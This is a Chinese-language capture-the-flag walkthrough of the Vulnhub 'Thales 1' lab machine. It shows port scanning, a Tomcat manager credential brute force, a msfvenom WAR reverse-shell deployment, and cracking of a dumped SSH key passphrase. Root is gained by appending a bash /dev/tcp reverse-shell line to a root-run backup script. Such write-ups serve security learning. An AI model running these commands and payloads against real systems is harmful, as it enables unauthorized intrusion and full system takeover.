Vulnhub之Thales 1靶机详细测试过程(手动获取Shell,不用metasploit)
Thales 1
识别目标主机IP地址
─(kali㉿kali)-[~/Desktop/Vulnhub/Thales]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:69:82:43 1 60 PCS Systemtechnik GmbH
192.168.56.207 08:00:27:db:3e:b3 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.207
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Thales]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.207 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-06 20:22 EST
Nmap scan report for localhost (192.168.56.207)
Host is up (0.00013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8c:19:ab:91:72:a5:71:d8:6d:75:1d:8f:65:df:e1:32 (RSA)
| 256 90:6e:a0:ee:d5:29:6c:b9:7b:05:db:c6:82:5c:19:bf (ECDSA)
|_ 256 54:4d:7b:e8:f9:7f:21:34:3e:ed:0f:d9:fe:93:bf:00 (ED25519)
8080/tcp open http Apache Tomcat 9.0.52
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.52
MAC Address: 08:00:27:DB:3E:B3 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.08 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、8080(http)
获得Shell
浏览器访问8080端口,返回Apache Tomcat默认页面,点击页面中的manager app 或者host manager弹出网页基本认证窗口。
看是否可以用metasploit破解该基本认证?
msf6 > use auxiliary/scanner/http/tomcat_mgr_login
msf6 auxiliary(scanner/http/tomcat_mgr_login) > show options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current databa
se
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (
Accepted: none, user, user&realm)
PASSWORD no The HTTP password to specify for authentication
PASS_FILE /usr/share/metasploit-framework/ no File containing passwords, one per line
data/wordlists/tomcat_mgr_defaul
t_pass.txt
Proxies no A proxy chain of format type:host:port[,type:host:port][..
.]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasplo
it-framework/wiki/Using-Metasploit
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI /manager/html yes URI for Manager login. Default is /manager/html
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no The HTTP username to specify for authentication
USERPASS_FILE /usr/share/metasploit-framework/ no File containing users and passwords separated by space, on
data/wordlists/tomcat_mgr_defaul e pair per line
t_userpass.txt
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /usr/share/metasploit-framework/ no File containing users, one per line
data/wordlists/tomcat_mgr_defaul
t_users.txt
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 192.168.56.207
RHOSTS => 192.168.56.207
msf6 auxiliary(scanner/http/tomcat_mgr_login) > run
[!] No active DB -- Credential data will not be saved!
[-] 192.168.56.207:8080 - LOGIN FAILED: role:r00t (Incorrect)
[+] 192.168.56.207:8080 - Login Successful: tomcat:role1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
利用破解得到的用户名和密码,成功登陆tomcat manager
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Thales]
└─$ msfvenom --platform linux -p linux/x86/shell/reverse_tcp LHOST=192.168.56.146 LPORT=5555 -f war -o shell.war
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of war file: 1601 bytes
Saved as: shell.war
利用msfvenom产生shell.war文件,然后通过tomcat manager部署到后台。
但是没有成功,选择的payload不对,需要是java类型的payload
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Thales]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.56.146 LPORT=5555 -f war -o shell2.war
Payload size: 1095 bytes
Final size of war file: 1095 bytes
Saved as: shell2.war
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Thales]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.207] 47200
which python
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
tomcat@miletus:/$ cd /home
cd /home
tomcat@miletus:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Aug 15 2021 .
drwxr-xr-x 24 root root 4.0K Oct 14 2021 ..
drwxr-xr-x 6 thales thales 4.0K Oct 14 2021 thales
至此拿到了目标主机的Shell
tomcat@miletus:/home/thales$ ls -alh
ls -alh
total 52K
drwxr-xr-x 6 thales thales 4.0K Oct 14 2021 .
drwxr-xr-x 3 root root 4.0K Aug 15 2021 ..
-rw------- 1 thales thales 457 Oct 14 2021 .bash_history
-rw-r--r-- 1 thales thales 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 thales thales 3.7K Apr 4 2018 .bashrc
drwx------ 2 thales thales 4.0K Aug 15 2021 .cache
drwx------ 3 thales thales 4.0K Aug 15 2021 .gnupg
drwxrwxr-x 3 thales thales 4.0K Aug 15 2021 .local
-rw-r--r-- 1 root root 107 Oct 14 2021 notes.txt
-rw-r--r-- 1 thales thales 807 Apr 4 2018 .profile
-rw-r--r-- 1 root root 66 Aug 15 2021 .selected_editor
drwxrwxrwx 2 thales thales 4.0K Aug 16 2021 .ssh
-rw-r--r-- 1 thales thales 0 Oct 14 2021 .sudo_as_admin_successful
-rw------- 1 thales thales 33 Aug 15 2021 user.txt
tomcat@miletus:/home/thales$ cat notes.txt
cat notes.txt
I prepared a backup script for you. The script is in this directory "/usr/local/bin/backup.sh". Good Luck.
tomcat@miletus:/home/thales$ cd .ssh
cd .ssh
tomcat@miletus:/home/thales/.ssh$ ls -alh
ls -alh
total 16K
drwxrwxrwx 2 thales thales 4.0K Aug 16 2021 .
drwxr-xr-x 6 thales thales 4.0K Oct 14 2021 ..
-rw-r--r-- 1 thales thales 1.8K Aug 16 2021 id_rsa
-rw-r--r-- 1 thales thales 396 Aug 16 2021 id_rsa.pub
tomcat@miletus:/home/thales/.ssh$ cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6103FE9ABCD5EF41F96C07F531922AAF
ZMlKhm2S2Cqbj+k3h8MgQFr6oG4CBKqF1NfT04fJPs1xbXe00aSdS+QgIbSaKWMh
+/ILeS/r8rFUt9isW2QAH7JYEWBgR4Z/9KSMSUd1aEyjxz7FpZj2cL1Erj9wK9ZA
InMmkm7xAKOWKwLTJeMS3GB4X9AX9ef/Ijmxx/cvvIauK5G2jPRyGSazMjK0QcwX
pkwnm4EwXPDiktkwzg15RwIhJdZBbrMj7WW9kt0CF9P754mChdIWzHrxYhCUIfWd
rHbDYTKmfL18LYhHaj9ZklkZjb8li8JIPvnJDcnLsCY+6X1xB9dqbUGGtSHNnHiL
rmrOSfI7RYt9gCgMtFimYRaS7gFuvZE/NmmIUJkH3Ccv1mIj3wT1TCtvREv+eKgf
/nj+3A6ZSQKFdlm22YZBilE4npxGOC03s81Rbvg90cxOhxYGTZMu/jU9ebUT2HAh
o1B972ZAWj3m5sDZRiQ+wTGqwFBFxF9EPia6sRM/tBKaigIElDSyvz1C46mLTmBS
f8KNwx5rNXkNM7dYX1Sykg0RreKO1weYAA0yQSHCY+iJTIf81CuDcgOIYRywHIPU
9rI20K910cLLo+ySa7O4KDcmIL1WCnGbrD4PwupQ68G2YG0ZOOIrwE9efkpwXPCR
Vi2TO2Zut8x6ZEFjz4d3aWIzWtf1IugQrsmBK+akRLBPjQVy/LyApqvV+tYfQelV
v9pEKMxR5f1gFmZpTbZ6HDHmEO4Y7gXvUXphjW5uijYemcyGx0HSqCSER7y7+phA
h0NEJHSBSdMpvoS7oSIxC0qe4QsSwITYtJs5fKuvJejRGpoh1O2HE+etITXlFffm
2J1fdQgPo+qbOVSMGmkITfTBDh1ODG7TZYAq8OLyEh/yiALoZ8T1AEeAJev5hON5
PUUP8cxX4SH43lnsmIDjn8M+nEsMEWVZzvaqo6a2Sfa/SEdxq8ZIM1Nm8fLuS8N2
GCrvRmCd7H+KrMIY2Y4QuTFR1etulbBPbmcCmpsXlj496bE7n5WwILLw3Oe4IbZm
ztB5WYAww6yyheLmgU4WkKMx2sOWDWZ/TSEP0j9esOeh2mOt/7Grrhn3xr8zqnCY
i4utbnsjL4U7QVaa+zWz6PNiShH/LEpuRu2lJWZU8mZ7OyUyx9zoPRWEmz/mhOAb
jRMSyfLNFggfzjswgcbwubUrpX2Gn6XMb+MbTY3CRXYqLaGStxUtcpMdpj4QrFLP
eP/3PGXugeJi8anYMxIMc3cJR03EktX5Cj1TQRCjPWGoatOMh02akMHvVrRKGG1d
/sMTTIDrlYlrEAfQXacjQF0gzqxy7jQaUc0k4Vq5iWggjXNV2zbR/YYFwUzgSjSe
SNZzz4AMwRtlCWxrdoD/exvCeKWuObPlajTI3MaUoxPjOvhQK55XWIcg+ogo9X5x
B8XDQ3qW6QJLFELXpAnl5zW5cAHXAVzCp+VtgQyrPU04gkoOrlrj5u22UU8giTdq
nLypW+J5rGepKGrklOP7dxEBbQiy5XDm/K/22r9y+Lwyl38LDF2va22szGoW/oT+
8eZHEOYASwoSKng9UEhNvX/JpsGig5sAamBgG1sV9phyR2Y9MNb/698hHyULD78C
-----END RSA PRIVATE KEY-----
tomcat@miletus:/home/thales/.ssh$
看到有thales用户的ssh私钥,将其拷贝至Kali Linux本地,修改权限:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Thales]
└─$ vim id_rsa
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Thales]
└─$ chmod 400 id_rsa
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Thales]
└─$ ssh -i id_rsa thales@192.168.56.207
The authenticity of host '192.168.56.207 (192.168.56.207)' can't be established.
ED25519 key fingerprint is SHA256:/oYiS8GEqdiC3TtzLk8dXI7HihfzcX0aHGyd0nHJGnw.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.207' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Thales]
└─$ ssh2john id_rsa >hashes
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Thales]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
vodka06 (id_rsa)
1g 0:00:00:02 DONE (2023-03-06 21:29) 0.4424g/s 1265Kp/s 1265Kc/s 1265KC/s vodka1420..vodka0260
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Thales]
└─$ ssh -i id_rsa thales@192.168.56.207
Enter passphrase for key 'id_rsa':
thales@192.168.56.207: Permission denied (publickey).
虽然破解出密码,但是并不能登陆ssh,返回permission denied
还是从backup.sh脚本入手,
tomcat@miletus:/home/thales$ echo "bash -c 'bash -i >& /dev/tcp/192.168.56.146/6666 0>&1'" >> /usr/local/bin/backup.sh
<.168.56.146/6666 0>&1'" >> /usr/local/bin/backup.sh
过一会在Kali Linux得到了目标主机返回的另一个Shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Thales]
└─$ sudo nc -nlvp 6666
[sudo] password for kali:
listening on [any] 6666 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.207] 43658
bash: cannot set terminal process group (1927): Inappropriate ioctl for device
bash: no job control in this shell
root@miletus:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@miletus:~# ls -alh
ls -alh
total 44K
drwx------ 6 root root 4.0K Oct 14 2021 .
drwxr-xr-x 24 root root 4.0K Oct 14 2021 ..
-rw------- 1 root root 275 Oct 14 2021 .bash_history
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
drwx------ 2 root root 4.0K Oct 14 2021 .cache
drwx------ 3 root root 4.0K Oct 14 2021 .gnupg
drwxr-xr-x 3 root root 4.0K Aug 15 2021 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 33 Aug 15 2021 root.txt
-rw-r--r-- 1 root root 66 Aug 15 2021 .selected_editor
drwx------ 2 root root 4.0K Aug 15 2021 .ssh
root@miletus:~# cat root.txt
cat root.txt
3a1c85bebf8833b0ecae900fb8598b17
root@miletus:~#
至此拿到了root shell好意思root flag
经验教训
-
msfvenom的使用,需要充分利用帮助选项:
用以下命令看可以支持哪些平台?
$ msfvenom --list platforms用以下命令看可以支持哪些payload,可以加上grep,管道过滤以下想要的payload,比如java
$ msfvenom --list payloads用以下命令看可以对于某payload需要配置哪些参数?
┌──(kali㉿kali)-[~] └─$ msfvenom -p java/jsp_shell_reverse_tcp --list-options Options for payload/java/jsp_shell_reverse_tcp: ========================= Name: Java JSP Command Shell, Reverse TCP Inline Module: payload/java/jsp_shell_reverse_tcp Platform: Linux, OSX, Solaris, Unix, Windows Arch: java Needs Admin: No Total size: 0 Rank: Normal Provided by: sf <stephen_fewer@harmonysecurity.com> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port SHELL no The system shell to use. Description: Connect back to attacker and spawn a command shell用以下命令查看支持哪些输出文件格式?
$ msfvenom --list formats -
对于本靶机首先需要确定载荷类型,比如是java类型,并且输出格式为war,否则部署会失败。
STRIVE FOR PROGRESS,NOT FOR PERFECTION
